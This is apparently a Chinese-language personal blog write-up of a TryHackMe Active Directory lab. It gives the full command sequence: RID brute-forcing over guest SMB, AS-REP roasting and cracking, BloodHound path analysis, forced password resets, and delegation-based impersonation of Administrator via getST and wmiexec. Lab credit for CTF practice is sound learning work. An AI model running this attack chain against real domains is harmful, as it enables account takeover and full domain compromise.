Before all
好久沒打ADㄌ,開心>w<
而且今天學到超多東西,也釐清了不少觀念
Victim’s IP : 10.10.24.60
Victim’s Host : thm.corp
Attacker’s IP : 10.9.195.189
Write Up
RECON
port scan
1 | rustscan -a 10.10.24.60 --ulimit 5000 -- -sC -sV -Pn |
Result
很標準的AD環境,有SMB, Kerberos, ldap, RDP …
也獲得了域名為thm.corp
Exploit
smb
crackmapexec
由nmap結果知道smb服務可以Anonymous,連進去抓檔案:
1 | crackmapexec smb 10.10.24.60 -u 'guest' -p '' --rid-brute |
Result
拿到使用者列表,利用 Impacket 庫進行下一步攻擊。
GetNPUsers.py
1 | python3 GetNPUsers.py thm.corp/ -usersfile ~/ctf/tryhackme/reset/userlist.txt -no-pass |
GetNPUsers可以抓到不需要使用前面驗證的使用者TGT,並嘗試本地爆破。
john-the-ripper
1 | john-the-ripper npusers_pass --wordlist=/home/wha13/wordlists/rockyou.txt |
把抓下來的pdf打開看看發現使用者LILY_ONEILL
的密碼
不過這是rabbit hole
Impersonate
Impersonate是抓到有Delegate權限時,可以對host內任意使用者作暫時的 impersonate 去獲得暫時的token進行登入
BloogHound
1 | bloodhound-python -c All -u 'TABATHA_BRITT' -p 'marlboro(1985)' -d thm.corp -ns 10.10.24.60 --zip |
抓zip檔案起來分析,從剛剛拿到的使用者TABATHA_BRITT開始
發現一連串對下一個使用者的全權限或者更改密碼權限
1 | net rpc password "SHAWNA_BRAY" "whale120" -U "thm.corp"/"TABATHA_BRITT"%"marlboro(1985)" -S 10.10.24.60 |
像是這樣,最後可以打到user DARLA_WINTERS@THM.CORP
getST
1 | sudo ./getST.py -spn "cifs/haystack.thm.corp" -impersonate "Administrator" "thm.corp/DARLA_WINTERS:Whale120" |
wmiexec
透過IPC$連線的腳本,可以支援直接登入/NTLM認證等
1 | python3 ./wmiexec.py -k -no-pass Administrator@haystack.thm.corp |
After all
晚安世界 >w<